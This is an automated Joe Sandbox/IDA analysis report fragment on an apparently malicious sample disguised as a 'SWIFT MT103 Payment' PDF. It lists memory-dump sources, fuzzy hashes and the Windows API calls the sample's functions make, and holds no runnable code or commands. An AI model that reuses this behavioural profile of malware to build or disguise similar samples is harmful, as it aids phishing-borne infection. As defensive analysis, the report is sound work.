                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                        • String ID:
                                                        • API String ID: 3058430110-0
                                                        • Opcode ID: f131ee11c0d220cb2dc6b3da44158834730645c68ebbd2a61d5b0c3ed448205f
                                                        • Instruction ID: 550681b3841f0f34ee613cb5364b25607849a03987ccfca5eaaec14299199b49
                                                        • Opcode Fuzzy Hash: f131ee11c0d220cb2dc6b3da44158834730645c68ebbd2a61d5b0c3ed448205f
                                                        • Instruction Fuzzy Hash: A931C270B00265EFDB20EF64D8849AA7BF5EF01312B9445AAF0A09F291D338CE81CB55
                                                        APIs
                                                        • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D10A
                                                        • GetLastError.KERNEL32(?,00000000), ref: 0045D12B
                                                        • DeleteFileW.KERNEL32(00000000,?), ref: 0045D14C
                                                        • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0045D16A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                                        • String ID:
                                                        • API String ID: 3321077145-0
                                                        • Opcode ID: 7cd5f2a63614e36a101d3a24e32b13d83311d412b7f68151a30e37c1c693f1dc
                                                        • Instruction ID: 240381fd0e223f31e6bb83dc4f900fe278965bce5f9bbaa9f824fb1079ab41c9
                                                        • Opcode Fuzzy Hash: 7cd5f2a63614e36a101d3a24e32b13d83311d412b7f68151a30e37c1c693f1dc
                                                        • Instruction Fuzzy Hash: 393180B5900301ABCB10AF71C985A1BF7E8AF84755F10891EF85497392C739FC45CB68
                                                        APIs
                                                        • GetParent.USER32(?), ref: 004505BF
                                                        • DefDlgProcW.USER32(?,00000138,?,?,004A83D8,?,004A83D8,?), ref: 00450610
                                                        • DefDlgProcW.USER32(?,00000133,?,?,004A83D8,?,004A83D8,?), ref: 0045065A
                                                        • DefDlgProcW.USER32(?,00000134,?,?,004A83D8,?,004A83D8,?), ref: 00450688
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Proc$Parent
                                                        • String ID:
                                                        • API String ID: 2351499541-0
                                                        • Opcode ID: 93bb19dea30658450b5dada9832e261aba4ffbe4fc891123e7e77a8d6405a749
                                                        • Instruction ID: e3e31f905615dd8bfbe674c7a91f48f64006a8638b4dc9b760805e547d05c650
                                                        • Opcode Fuzzy Hash: 93bb19dea30658450b5dada9832e261aba4ffbe4fc891123e7e77a8d6405a749
                                                        • Instruction Fuzzy Hash: 8C3128362411006BC2209B299C58DBB7B58EBC7336F14465BFA54832D3CB769826C768
                                                        APIs
                                                          • Part of subcall function 00438C85: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00438C95
                                                          • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                        • SendMessageW.USER32(00000000,0000102C,00000000,00000002), ref: 00461420
                                                        • SendMessageW.USER32(00000000,0000102C,00000000,00000002), ref: 0046144F
                                                        • __itow.LIBCMT ref: 00461461
                                                        • __itow.LIBCMT ref: 004614AB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$__itow$_wcslen
                                                        • String ID:
                                                        • API String ID: 2875217250-0
                                                        • Opcode ID: 347b44770508ca88cf5981266e998b528a2978f718c0dd2978777487f2c1d3f7
                                                        • Instruction ID: b65c482f8247f617b799fd724a7506577ebf884cdb52d0d4602b18db992df379
                                                        • Opcode Fuzzy Hash: 347b44770508ca88cf5981266e998b528a2978f718c0dd2978777487f2c1d3f7
                                                        • Instruction Fuzzy Hash: 3A213D7670031067D210BA169C86FAFB794EB94714F08443FFF44AB241EE69E94687EB
                                                        APIs
                                                        • GetForegroundWindow.USER32 ref: 00472806
                                                          • Part of subcall function 00443EEF: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 00443F11
                                                          • Part of subcall function 00443EEF: GetCurrentThreadId.KERNEL32 ref: 00443F18
                                                          • Part of subcall function 00443EEF: AttachThreadInput.USER32(00000000), ref: 00443F1F
                                                        • GetCaretPos.USER32(?), ref: 0047281A
                                                        • ClientToScreen.USER32(00000000,?), ref: 00472856
                                                        • GetForegroundWindow.USER32 ref: 0047285C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                        • String ID:
                                                        • API String ID: 2759813231-0
                                                        • Opcode ID: f08c9821fa495b0e17bd1c697e1e5286648ea95901ecf1a9ceb1535147bec3ee
                                                        • Instruction ID: 38f02bd9b1f6bed34cfa7ce2d7f69328ba3456287a0ba45db7850a86b8391dd2
                                                        • Opcode Fuzzy Hash: f08c9821fa495b0e17bd1c697e1e5286648ea95901ecf1a9ceb1535147bec3ee
                                                        • Instruction Fuzzy Hash: FF2195716403056FE310EF65CC42F5BB7E8AF84708F144D2EF544AB282D6FAB9858795
                                                        APIs
                                                          • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                                                        • GetWindowLongW.USER32(?,000000EC), ref: 0047728E
                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 004772A9
                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 004772C0
                                                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001,?,?), ref: 004772D0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Window$Long$AttributesLayered
                                                        • String ID:
                                                        • API String ID: 2169480361-0
                                                        • Opcode ID: cf64f2ba38e7b8586118add57273b6dbf74680437e58013ae8f64db123384f26
                                                        • Instruction ID: faea1ea985e506ac999786301d765d91882fdca708237d94abe4bce3661c65f1
                                                        • Opcode Fuzzy Hash: cf64f2ba38e7b8586118add57273b6dbf74680437e58013ae8f64db123384f26
                                                        • Instruction Fuzzy Hash: 5F11B431205510ABD310FB29DD45F9BB798FF91720F10862EF455E72E2C7A8AC45C7A8
                                                        APIs
                                                        • SendMessageW.USER32 ref: 00448CB8
                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00448CE0
                                                        • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448D19
                                                        • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D62
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$LongWindow
                                                        • String ID:
                                                        • API String ID: 312131281-0
                                                        • Opcode ID: 75ae646de43e531ea10203f5aba75cb55710deee3f48b72b110124c921b55059
                                                        • Instruction ID: 9d6bf2a2f0cb0d5184a29e15ea511504db1ac53b4253ca88fa0f688086887250
                                                        • Opcode Fuzzy Hash: 75ae646de43e531ea10203f5aba75cb55710deee3f48b72b110124c921b55059
                                                        • Instruction Fuzzy Hash: B12174715053019BF3208F18D98879FB7E4FBD5325F140B2EF594962D0DBB58449C796
                                                        APIs
                                                        • select.WSOCK32 ref: 0045890A
                                                        • __WSAFDIsSet.WSOCK32(00000000,00000000), ref: 00458919
                                                        • accept.WSOCK32(00000000,00000000,00000000,00000000,00000000), ref: 00458927
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00458952
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: ErrorLastacceptselect
                                                        • String ID:
                                                        • API String ID: 385091864-0
                                                        • Opcode ID: 4f99be09ea3748399bcd45f1fb284b1e509608db9923cba0f0141099163bafeb
                                                        • Instruction ID: 93f38c3b8a65fd8a68e5265ae944391143789c71a4918893f245a539b4228a7d
                                                        • Opcode Fuzzy Hash: 4f99be09ea3748399bcd45f1fb284b1e509608db9923cba0f0141099163bafeb
                                                        • Instruction Fuzzy Hash: 1F2166712043019BD314EF29C842BABB7E5AFC4714F144A2EF994DB2C1DBB4A985CB99
                                                        APIs
                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00438D6F
                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438D82
                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438D9A
                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438DB4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        • Opcode ID: 265964968b448329a9940c71d90cafee1d95b27ec759889be900fe0a368f8aeb
                                                        • Instruction ID: 707762f1bc06eebb59e9357f9c77b20c0e090dcf7cedc03b298b4f863176c0ea
                                                        • Opcode Fuzzy Hash: 265964968b448329a9940c71d90cafee1d95b27ec759889be900fe0a368f8aeb
                                                        • Instruction Fuzzy Hash: 77113AB6204305AFD210EF58DC84F6BF7E8EBE8750F20491EF580D7290D6B1A8468BA1
                                                        APIs
                                                        • CreateWindowExW.USER32(?,?,?,FFFFFFFF,?,?,?,?,?,?,00400000,00000000), ref: 0043367E
                                                        • GetStockObject.GDI32(00000011), ref: 00433695
                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 0043369F
                                                        • ShowWindow.USER32(00000000,00000000), ref: 004336BA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Window$CreateMessageObjectSendShowStock
                                                        • String ID:
                                                        • API String ID: 1358664141-0
                                                        • Opcode ID: a78582cd8c915fd270119012ff4eddf0033f410814d91724adacf9cac7d73a6b
                                                        • Instruction ID: 5bb77caae3378c1c36de35f78993aeb7f53e4fc0e9047450929301c31466c70f
                                                        • Opcode Fuzzy Hash: a78582cd8c915fd270119012ff4eddf0033f410814d91724adacf9cac7d73a6b
                                                        • Instruction Fuzzy Hash: 60114F72204A00BFD254DF55CC49F5BB3F9AFCCB01F20950DB254922A0D7B4E9418BA9
                                                        APIs
                                                        • GetCurrentThreadId.KERNEL32 ref: 004441B8
                                                        • MessageBoxW.USER32(?,?,?,?), ref: 004441F6
                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0044420C
                                                        • CloseHandle.KERNEL32(00000000), ref: 00444213
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                        • String ID:
                                                        • API String ID: 2880819207-0
                                                        • Opcode ID: 146d2f4ba151d14deb3aa3acfdd6de045567f86e28c98b22242e1e1489ea4094
                                                        • Instruction ID: a177bb78e812b0c83f085b16f259857c8a511f23e32e5024349264f8b0df3d09
                                                        • Opcode Fuzzy Hash: 146d2f4ba151d14deb3aa3acfdd6de045567f86e28c98b22242e1e1489ea4094
                                                        • Instruction Fuzzy Hash: C401E5364183105BD300DB28ED08A9BBBD8BFD9721F18067EF89893351E6B48948C7B6
                                                        APIs
                                                        • GetWindowRect.USER32(?,?), ref: 00434037
                                                        • ScreenToClient.USER32(?,?), ref: 0043405B
                                                        • ScreenToClient.USER32(?,?), ref: 00434085
                                                        • InvalidateRect.USER32(?,?,?), ref: 004340A4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: ClientRectScreen$InvalidateWindow
                                                        • String ID:
                                                        • API String ID: 357397906-0
                                                        • Opcode ID: 751e48bbdad3fa965b56aea51b9fa4e55de6b4169d4940aca7a3583b508516de
                                                        • Instruction ID: 02545dd0d615a745195cb6f618e51c1f9c2552a202a2369b8695847d2ce6fb2f
                                                        • Opcode Fuzzy Hash: 751e48bbdad3fa965b56aea51b9fa4e55de6b4169d4940aca7a3583b508516de
                                                        • Instruction Fuzzy Hash: 24117EB9608302AFC304DF18D98095BBBE9FFD8650F10891EF88993350D770E9498BA2
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                        • String ID:
                                                        • API String ID: 3016257755-0
                                                        • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                        • Instruction ID: 11ead64bc5c18606fe5fffcedc2bbdf89ccfa4faa7bd693ca83be0ddd2add3a5
                                                        • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                        • Instruction Fuzzy Hash: AA11A272500059BBCF225E85EC018EE3F66FB88354B898416FE2858131C73AC9B1AB85
                                                        APIs
                                                        • __wsplitpath.LIBCMT ref: 00436A45
                                                          • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                        • __wsplitpath.LIBCMT ref: 00436A6C
                                                        • __wcsicoll.LIBCMT ref: 00436A93
                                                        • __wcsicoll.LIBCMT ref: 00436AB0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                                        • String ID:
                                                        • API String ID: 1187119602-0
                                                        • Opcode ID: 5b78189461bd351535feab14c2aa3b28919a840a222a6c91b90152b853837e7b
                                                        • Instruction ID: cc447ddabc085245cf6c6bda96777749177fc915bba42f20b5b260b799017f3a
                                                        • Opcode Fuzzy Hash: 5b78189461bd351535feab14c2aa3b28919a840a222a6c91b90152b853837e7b
                                                        • Instruction Fuzzy Hash: 690165B64043416BD724EB50D881EEBB3ED7BD8304F04C91EB5C982041FB38D24C87A6
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: _wcslen$_malloc_wcscat_wcscpy
                                                        • String ID:
                                                        • API String ID: 1597257046-0
                                                        • Opcode ID: c6315170b72fc38ac3402e309a582701e86f5597762031e929743c9331fb589b
                                                        • Instruction ID: 9df5ee2dcc5f1a759a9cde70f7b42babd8a8bdcc369222b22224423102f690bd
                                                        • Opcode Fuzzy Hash: c6315170b72fc38ac3402e309a582701e86f5597762031e929743c9331fb589b
                                                        • Instruction Fuzzy Hash: BFF06D32200200AFC314EB66C885E6BB3EAEBC5324F04852EF556C7791DB39F841C764
                                                        APIs
                                                        • DeleteObject.GDI32(?), ref: 0045564E
                                                        • DeleteObject.GDI32(?), ref: 0045565C
                                                        • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                        • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: DeleteDestroyObject$IconWindow
                                                        • String ID:
                                                        • API String ID: 3349847261-0
                                                        • Opcode ID: 3ca9d014447a04aedc0dfd8276f5a6e9fbff97cfd7386ed498fa31ba53dce0fe
                                                        • Instruction ID: 3a9029eb8e47786e7dec82746d504bb216afab776d143f23dce7b1a7602128e4
                                                        • Opcode Fuzzy Hash: 3ca9d014447a04aedc0dfd8276f5a6e9fbff97cfd7386ed498fa31ba53dce0fe
                                                        • Instruction Fuzzy Hash: 06F03C702006419BDB20AF65DDD8A2B77ACEF45322740456AFD04D7242DB28DC498B7D
                                                        APIs
                                                        • EnterCriticalSection.KERNEL32(?), ref: 0044B60B
                                                        • InterlockedExchange.KERNEL32(?,?), ref: 0044B619
                                                        • LeaveCriticalSection.KERNEL32(?), ref: 0044B630
                                                        • LeaveCriticalSection.KERNEL32(?), ref: 0044B641
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                        • String ID:
                                                        • API String ID: 2223660684-0
                                                        • Opcode ID: ff66e887f7cbb15f4500d5b6eb7e85b0bae77af45fe5867796c74117f3ed7197
                                                        • Instruction ID: 8f2921e390180aa9c6083979f061463a0462abb68b72a76a452ff5fd2bc04521
                                                        • Opcode Fuzzy Hash: ff66e887f7cbb15f4500d5b6eb7e85b0bae77af45fe5867796c74117f3ed7197
                                                        • Instruction Fuzzy Hash: 35F08C362422019F82249B59EA488DBB3FDEBE97213009C2FE142C32108BB5F806CB75
                                                        APIs
                                                          • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                          • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                          • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                          • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                          • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
